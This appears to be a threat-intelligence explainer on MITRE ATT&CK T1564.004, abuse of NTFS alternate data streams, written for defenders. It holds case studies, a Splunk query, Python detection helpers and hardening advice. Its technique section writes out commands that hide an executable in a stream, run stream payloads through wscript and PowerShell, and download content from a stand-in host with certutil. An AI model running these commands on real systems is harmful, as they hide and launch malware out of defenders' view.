technique_id T1564.004
category MITRE ATT&CK
tactics
Defense Evasion
parent_technique T1564 Hide Artifacts
published April 2026

T1564.004: NTFS Alternate Data Streams

Adversaries exploit a built-in feature of the Windows NTFS file system — alternate data streams — to attach hidden payloads to legitimate files. The stream content is invisible to standard directory listings, File Explorer, and many antivirus tools, while remaining fully executable. The technique requires no special privileges, leaves the host file's visible size unchanged, and has been in active use by both nation-state actors and commodity malware for over two decades.

T1564.004 is a sub-technique of T1564 (Hide Artifacts) under the Defense Evasion tactic. It exploits a design feature of NTFS that was originally introduced to provide compatibility with Apple's Hierarchical File System (HFS), which used resource forks to store file metadata alongside file content. In Windows, every NTFS file has at least one data stream — the default unnamed stream — that holds the file's visible contents. Alternate data streams (ADS) are additional named data attributes attached to the same file, accessible via the colon syntax: filename.txt:streamname. Any data can be stored in an ADS, including complete executables and scripts, without affecting the file's reported size or timestamp in standard views.

The evasion value is significant. A security analyst examining a directory listing, a file system inventory, or a standard antivirus scan result will see only the host file. The ADS content does not appear. File Explorer does not show it. The dir command does not show it by default. Even the file's size reported to the operating system reflects only the default stream. An adversary can stage an entire malware payload attached to a legitimate system file — desktop.ini, a known Windows configuration file, is a documented real-world choice — and that payload is effectively invisible to any tool that does not specifically enumerate alternate streams.

How NTFS Alternate Data Streams Work

Creating an ADS from the command line requires only write access to the target file and directory. The syntax is straightforward:

# Write malicious content to an ADS on a benign host file
# The visible file legitimate.txt remains unchanged in size
type malicious.exe > legitimate.txt:payload.exe

# Verify the host file size — only the default stream is counted
dir legitimate.txt
# File shows its original size, with no indication of the attached stream

# Enumerate all alternate streams in a directory
dir /r
# Or with PowerShell:
Get-Item legitimate.txt -Stream *

Executing a payload stored in an ADS can be accomplished through several LOLBin (Living Off the Land Binary) pathways that make the command-line activity appear more legitimate:

# Execute ADS payload via wscript
wscript.exe legitimate.txt:payload.js

# Execute via PowerShell Invoke-Expression reading from stream
$s = Get-Content legitimate.txt -Stream payload.ps1
Invoke-Expression $s

# Stage content with certutil: it downloads (-urlcache) or decodes (-decode) into a
# file or stream path; certutil itself does not execute what it writes
certutil -urlcache -split -f http://host/file legitimate.txt

# Classic command prompt execution from an ADS
for /f "usebackq delims=?" %i in (legitimate.txt:payload.bat) do @%i

Beyond payload storage, ADS have several secondary uses in attacker tradecraft:

  • Data exfiltration staging: collected credential files or sensitive data can be assembled into an ADS attached to a common file, reducing the file count visible to monitoring tools.
  • Persistence via scheduled tasks: the stream path can be referenced directly in a scheduled task or registry run key, pointing to an executable hidden inside an ADS.
  • Configuration storage: some malware families use ADS to store encrypted configuration data or C2 addresses alongside a dropper component, making the configuration harder to extract during incident response.

One legitimate ADS that defenders should be familiar with is :Zone.Identifier — the Mark of the Web (MotW) stream that Windows attaches to files downloaded from the internet, signalling to applications that the file came from an untrusted source. Adversaries sometimes deliberately strip this stream (or deliver content through methods that prevent it from being created) to prevent SmartScreen and macro policy checks from triggering. Detecting its absence on files that should carry it is itself a detection signal.
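The Zone.Identifier stream is a small INI-style text body, so its absence, or a downgraded zone value, can be checked from any stream inventory a hunting script collects. This Python is an added example, not code from the original page; the stream body, the inventory records and the set of file types expected to carry MotW are assumptions.

```python
import os

# Constructed Zone.Identifier stream body in the INI layout Windows writes.
# ZoneId values: 0 local machine, 1 intranet, 2 trusted sites, 3 internet, 4 restricted.
MOTW_INTERNET = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                 "ReferrerUrl=https://example.test/\r\n"
                 "HostUrl=https://example.test/report.docm\r\n")

def parse_zone_identifier(body):
    """Parse the [ZoneTransfer] section into a dict; ZoneId becomes an int."""
    fields, in_section = {}, False
    for line in body.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[zonetransfer]"
        elif in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    if fields.get("ZoneId", "").isdigit():
        fields["ZoneId"] = int(fields["ZoneId"])
    return fields

# Assumed set of downloaded file types that should always carry MotW.
SHOULD_CARRY_MOTW = {".exe", ".dll", ".docm", ".xlsm", ".js", ".vbs", ".iso", ".lnk"}

def motw_findings(inventory):
    """inventory items: {"path": ..., "origin": "download"|"local", "streams": {name: body}}.
    Flags downloaded files whose MotW stream is missing or claims a zone below Internet."""
    findings = []
    for item in inventory:
        ext = os.path.splitext(item["path"])[1].lower()
        if item["origin"] != "download" or ext not in SHOULD_CARRY_MOTW:
            continue
        # NTFS stream names are case-insensitive, so compare them lower-cased.
        body = next((b for n, b in item["streams"].items()
                     if n.lower() == "zone.identifier"), None)
        if body is None:
            findings.append((item["path"], "motw_missing"))
            continue
        zone = parse_zone_identifier(body).get("ZoneId")
        if not isinstance(zone, int) or zone < 3:
            findings.append((item["path"], f"motw_zone_{zone}"))
    return findings

INVENTORY = [  # constructed records, as a hunting script might collect them
    {"path": r"C:\Users\ann\Downloads\report.docm", "origin": "download",
     "streams": {"Zone.Identifier": MOTW_INTERNET}},
    {"path": r"C:\Users\ann\Downloads\update.exe", "origin": "download", "streams": {}},
    {"path": r"C:\Users\ann\Downloads\tool.js", "origin": "download",
     "streams": {"zone.identifier": "[ZoneTransfer]\r\nZoneId=2\r\n"}},
    {"path": r"C:\Users\ann\Downloads\notes.txt", "origin": "download", "streams": {}},
]
```

A zone of 2 (trusted sites) on an internet download is as much a signal as a missing stream, since SmartScreen and macro policy key off the zone value rather than the stream's mere presence.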

Note

ADS are a property of the NTFS file system. They do not survive being copied to FAT32 or exFAT storage, transferred via SMB to non-NTFS shares, or sent as email attachments — the alternate stream data is silently dropped. This is both a limitation for adversaries (exfiltration via non-NTFS channels loses the hidden data) and a forensic indicator (the presence of an ADS on a file means it was created on or transferred via an NTFS volume).

Real-World Case Studies

Astaroth: ADS as a Core Living-Off-the-Land Component

Astaroth is a Brazilian banking trojan that has targeted users across Latin America, North America, and Europe since 2017. A significant evolution documented by Microsoft in early 2020 introduced ADS abuse as a central element of the malware's attack chain. Astaroth hid binary payload data inside the ADS of desktop.ini — a legitimate Windows configuration file present in many directories — without altering the file's visible size. Multiple stages of the infection chain used this ADS to store and retrieve components: the malware injected into legitimate Windows processes including userinit.exe and colorcpl.exe, and at several points wrote and read from the hidden stream to avoid creating standalone malicious files that endpoint security products could detect. This approach combined with the exclusive use of legitimate LOLBins — wmic.exe, bitsadmin.exe, extexport.exe, regsvr32.exe — meant no traditionally malicious executable ever appeared in standard file listings during the entire infection chain.

BitPaymer / Indrik Spider: ADS for Ransomware Self-Persistence

BitPaymer, the ransomware operated by Indrik Spider (the group also responsible for Dridex and its evolution into Evil Corp), was first observed ransoming the UK's National Health Service in 2017 and continued targeted big-game hunting operations through subsequent years. BitPaymer was documented implementing a specific ADS self-check: when executing, the malware verified whether it was already running from an alternate data stream. If not, it created an ADS on an arbitrary host file, copied itself into that stream, and relaunched from the stream path before deleting the original executable. The result was a ransomware binary that, after initial execution, existed only as an ADS with no standalone file counterpart — making it significantly harder to locate and remove through standard incident response file hunting procedures.

Anchor Malware: ADS Staging in TrickBot Operations

Anchor is a modular backdoor developed by the TrickBot group and deployed in high-value targeted intrusions, typically against financial institutions and critical infrastructure operators. Analysis by Cybereason documented Anchor using ADS to store components and configuration data during its installation phase. The malware used the esentutl.exe LOLBin — a legitimate Windows Extensible Storage Engine utility — to read from and write to alternate data streams as part of its staging process, keeping malicious components hidden while establishing persistence through scheduled tasks that referenced ADS paths. The use of a legitimate Windows database tool to interact with streams provided an additional layer of defence evasion beyond the ADS hiding itself.

Detection Strategies

Detection for T1564.004 requires telemetry sources that most default Windows configurations do not enable. The critical control is Sysmon Event ID 15, which logs file stream creation events — without it, ADS creation is largely invisible to SIEM-based detection.

Splunk — ADS Creation and Execution Events

# Detect ADS creation via Sysmon Event ID 15 (FileCreateStreamHash)
# and process execution referencing ADS paths.
# Event ID 1 carries no TargetFilename and Event ID 15 carries no CommandLine:
# fillnull them first, otherwise the where and stats clauses drop those events.
# The stream regex wants a colon followed by a name that runs to the next space,
# so drive-letter colons (C:\...) and URLs (http://...) do not match;
# "-Stream " catches the PowerShell Get-Content form.
# Sort on a numeric rank: "sort - risk" would order "medium" before "high".
index=wineventlog (EventCode=15 OR EventCode=1)
| fillnull value="-" TargetFilename CommandLine User
| eval event_type=case(
    EventCode=15, "stream_created",
    EventCode=1 AND (match(CommandLine,":[^\\\\/: ]+( |$)") OR match(CommandLine,"(?i)-Stream ")),
    "stream_executed",
    true(), "other"
  )
| where event_type != "other"
| where NOT match(TargetFilename,"(?i):Zone\.Identifier$")
  AND NOT match(TargetFilename,"(?i):SmartScreen$")
| eval risk=case(
    match(CommandLine,"(?i)(wscript|cscript|powershell|certutil|regsvr32|mshta|esentutl).*(:|-Stream )"),
    "high",
    event_type="stream_created", "medium",
    true(), "low"
  )
| stats count by Computer, User, Image, CommandLine, TargetFilename, event_type, risk
| where risk IN ("high","medium")
| eval risk_rank=case(risk="high", 2, risk="medium", 1, true(), 0)
| sort - risk_rank

Behavioral Indicators

Indicator: Sysmon Event ID 15 for a stream name other than :Zone.Identifier or :SmartScreen
What it means: Non-system ADS creation; legitimate software rarely creates custom named streams. Any unexpected stream name on a non-system file warrants investigation.

Indicator: Process execution where the command line contains a colon-delimited path (e.g. file.txt:payload.exe)
What it means: Direct ADS execution; a process being launched from a stream path is highly anomalous and has no common legitimate use case in standard enterprise environments.

Indicator: LOLBins (wscript.exe, certutil.exe, esentutl.exe, regsvr32.exe) with command-line arguments referencing a colon stream path
What it means: ADS payload execution via a living-off-the-land binary; the combination of a trusted Windows process with a stream path argument is a documented pattern across Astaroth, Anchor, and other malware families.

Indicator: Downloaded or received file missing the :Zone.Identifier ADS that should normally be present
What it means: MotW stripping; the file was delivered through a method that avoids MotW attachment (ISO, VHD, container format) or had the stream explicitly deleted. Relevant for detecting bypass of macro policy and SmartScreen.

Indicator: dir /r or Streams.exe output revealing streams on common system files like desktop.ini
What it means: Consistent with Astaroth's documented ADS hiding location; system configuration files should not have custom streams, and their presence indicates staging activity.
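The classification the Splunk search and the indicator table above describe, carried out in Python over a handful of constructed Sysmon-style records. This is an added example, not code from the page or any referenced vendor; the stream allowlist, the LOLBin list and the sample records are assumptions, and the stream-path regex also covers the for /f and -Stream forms shown earlier.

```python
import re

# Streams Windows itself writes to ordinary files (assumed allowlist; extend per environment).
KNOWN_STREAMS = {"zone.identifier", "smartscreen"}
# Trusted binaries the page lists as ADS execution/staging pathways.
LOLBINS = {"wscript.exe", "cscript.exe", "powershell.exe", "certutil.exe",
           "regsvr32.exe", "mshta.exe", "esentutl.exe"}
# <file>:<stream>[:$DATA]; stream names exclude \ / : and whitespace, so C:\ and http:// never match.
STREAM_RE = re.compile(r'([^\s"\'()/:]+):([^\\/:\s"\'()]+)(?::\$DATA)?(?=[\s"\'()]|$)')
PS_STREAM_RE = re.compile(r'-Stream\s+([^\s"\']+)', re.IGNORECASE)

def stream_refs(text):
    """(host_file, stream_name) pairs referenced in a path or command line."""
    text = text or ""
    refs = [(h, s) for h, s in STREAM_RE.findall(text)
            # 'C:foo' is a drive-relative path; '12:30' or 'host:8080' are not streams
            if not (len(h) == 1 and h.isalpha()) and not s.isdigit()]
    # PowerShell's -Stream parameter names a stream without colon syntax;
    # '-Stream *' is enumeration (a hunting command), not a payload reference.
    refs += [("<-Stream>", m) for m in PS_STREAM_RE.findall(text) if m != "*"]
    return refs

def classify(ev):
    """Score a Sysmon ID 15 (stream created) or ID 1 (process created) event."""
    image = (ev.get("Image") or "").rsplit("\\", 1)[-1].lower()
    if ev["EventCode"] == 15:
        names = [s for _, s in stream_refs(ev.get("TargetFilename"))]
        if not names or names[-1].lower() in KNOWN_STREAMS:
            return None
        return ("medium", "stream_created", names[-1])
    if ev["EventCode"] == 1:
        names = [s for _, s in stream_refs(ev.get("CommandLine"))
                 if s.lower() not in KNOWN_STREAMS]
        if not names:
            return None
        # A trusted Windows binary handed a stream path is the documented pattern.
        return ("high" if image in LOLBINS else "medium", "stream_executed", names[0])
    return None

def triage(events):
    """Findings sorted high before medium (a plain string sort would reverse them)."""
    rank = {"high": 0, "medium": 1}
    hits = [(h[0], h[1], ev.get("Image"), h[2]) for ev in events if (h := classify(ev))]
    return sorted(hits, key=lambda f: rank[f[0]])

SAMPLE_EVENTS = [  # constructed Sysmon-style records, not real telemetry
    {"EventCode": 15, "TargetFilename": r"C:\Users\ann\Downloads\report.pdf:Zone.Identifier"},
    {"EventCode": 15, "TargetFilename": r"C:\Users\ann\Documents\desktop.ini:payload.exe"},
    {"EventCode": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\ann\Documents\legitimate.txt:payload.js"},
    {"EventCode": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://example.test/x out.txt"},
    {"EventCode": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-Item C:\data\legit.txt -Stream *"},
]
```

Only the desktop.ini stream creation and the wscript launch survive; the MotW stream, the plain certutil download and the hunting-style Get-Item -Stream * call are dropped, which is the false-positive handling the Splunk search needs as well.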
Detection gap

Sysmon is not installed by default on Windows systems. Without Event ID 15 (FileCreateStreamHash), ADS creation events produce no telemetry in standard Windows event logs. Deploying Sysmon with a configuration that includes file stream logging is a prerequisite for reliable T1564.004 detection — it cannot be retrofitted from existing logs after an incident.

Known Threat Actors Using T1564.004

ADS abuse spans nation-state espionage tooling and commodity cybercrime equally. The following represent consistently documented users across both categories.

  • Indrik Spider / Evil Corp (cybercriminal, Russia-linked) — BitPaymer ransomware uses ADS for self-copying and execution to erase the standalone binary after initial run; the group subsequently developed WastedLocker and Hades with similar evasion approaches
  • TrickBot / Wizard Spider (cybercriminal) — Anchor backdoor uses ADS for component staging and esentutl.exe for stream interaction during targeted financial institution and critical infrastructure intrusions
  • OceanLotus / APT32 (Vietnam-nexus) — Operation Cobalt Kitty documented use of ADS as part of a multi-stage infection chain in targeted corporate espionage against Asian conglomerates
  • Astaroth operators (cybercriminal, Brazil-based) — Systematic multi-stage ADS abuse hiding binary payloads inside desktop.ini streams across campaigns targeting banking credentials in Brazil, Europe, and North America
  • LATRODECTUS (cybercriminal, IcedID successor) — Documented in a May 2024 Elastic analysis as using ADS during its installation and persistence phases; assessed as a potential replacement for IcedID as an initial access broker tool
  • Regin platform (nation-state, attributed to Five Eyes) — Used NTFS extended attributes and alternate streams for long-term covert storage of components across highly targeted espionage operations against GSM network operators

Defensive Recommendations

  1. Deploy Sysmon with FileCreateStreamHash logging enabled: Sysmon Event ID 15 is the primary telemetry source for ADS detection. Deploy Sysmon with a configuration that captures stream creation events across all non-system directories, excluding known legitimate streams (:Zone.Identifier, :SmartScreen, :{SomeGUID} thumbnail cache entries). This is the foundational control — without it, reliable detection of T1564.004 is not achievable through log analysis alone.
  2. Alert on process execution from ADS paths: Build SIEM detection rules for Sysmon Event ID 1 (Process Create) where the command line or image path contains the colon stream syntax. Any process launched from an ADS path is anomalous in standard enterprise environments and should be treated as high-priority. Extend this to cover LOLBins — wscript.exe, cscript.exe, mshta.exe, certutil.exe, regsvr32.exe, esentutl.exe — invoked with stream-path arguments.
  3. Conduct periodic ADS enumeration during threat hunting: Deploy Streams.exe (Microsoft Sysinternals) or use dir /r in hunting scripts to enumerate all non-standard ADS on sensitive directories including %TEMP%, %APPDATA%, %PUBLIC%, user profile directories, and system configuration file locations. Any stream named outside the expected set of Windows-created streams warrants analysis.
  4. Monitor for MotW absence on downloaded files: Alerting on the absence of :Zone.Identifier streams on files received via email or browser download requires EDR or Sysmon integration. Files that should carry MotW but do not — particularly Office documents and executables — may have been delivered through container formats designed to strip it, which is closely related to ADS manipulation as a defence evasion category.
  5. Apply application control policies that restrict execution from non-standard paths: Windows Defender Application Control (WDAC) and AppLocker can be configured to block execution of files whose paths reference stream syntax, preventing ADS payloads from executing directly even if they are present on disk. Rules blocking execution from %TEMP% and user-writable directories should be combined with stream-path restrictions for layered coverage.
  6. Include ADS enumeration in incident response procedures: Standard IR runbooks for Windows hosts should include automated ADS enumeration as part of the initial triage phase. Many IR toolkits and EDR platforms now support stream enumeration natively; where they do not, Streams.exe should be included in the response toolkit and executed early in the investigation before potential cleanup activity removes stream data.

MITRE ATT&CK Mapping

Technique ID: T1564.004
Technique Name: Hide Artifacts: NTFS File Attributes
Parent Technique: T1564 Hide Artifacts
Tactic: Defense Evasion (TA0005)
Platforms: Windows
Data Sources: Command: Command Execution; File: File Metadata; File: File Modification; Process: Process Creation
Mitigations: M1022 Restrict File and Directory Permissions (limited applicability)
Version: 1.2 (Last Modified: October 24, 2025)
MITRE Reference: attack.mitre.org/techniques/T1564/004

Frequently Asked Questions

What is T1564.004 NTFS Alternate Data Streams?

T1564.004 is a MITRE ATT&CK sub-technique under Defense Evasion in which adversaries exploit NTFS alternate data streams — a feature of the Windows NTFS file system that allows multiple data streams to be attached to a single file — to store malicious payloads, binaries, or scripts in locations not visible to standard directory listings, File Explorer, or security tools that do not inspect alternate stream data.

How do adversaries use NTFS alternate data streams?

Adversaries write malicious executables, scripts, or encoded payloads into the alternate data stream of an existing benign file using the colon syntax — for example, writing to legitimate.txt:hidden.exe. The host file size does not change and the stream content is invisible to dir, File Explorer, and many antivirus tools. The payload can then be executed by referencing the full stream path, or extracted and loaded into memory via LOLBins like wscript.exe, powershell.exe, or certutil.exe.

How can organizations detect NTFS alternate data stream abuse?

Detection relies on enabling Sysmon Event ID 15 (FileCreateStreamHash), which logs file stream creation events including the stream name and hash. SIEM rules should alert on process execution where the command line contains the colon stream syntax, file creation events where the stream name does not match expected system streams such as :Zone.Identifier, and execution of LOLBins with stream-path arguments. The Streams.exe Sysinternals tool and dir /r can enumerate alternate streams on demand during threat hunting.

Sources and References

  • MITRE ATT&CK — T1564.004 Hide Artifacts: NTFS File Attributes: attack.mitre.org
  • Microsoft Security Blog — Latest Astaroth living-off-the-land attacks are even more invisible but not less observable: microsoft.com
  • CrowdStrike — Big Game Hunting: The Evolution of INDRIK SPIDER from Dridex Wire Fraud to BitPaymer Targeted Ransomware: crowdstrike.com
  • Cybereason — Dropping Anchor: From a TrickBot Infection to the Discovery of the Anchor Malware: cybereason.com
  • Elastic Security — Spring Cleaning with LATRODECTUS (Stepanic & Bousseaden, May 2024): elastic.co
  • SANS ISC — Alternate Data Streams: Adversary Defense Evasion and Detection: isc.sans.edu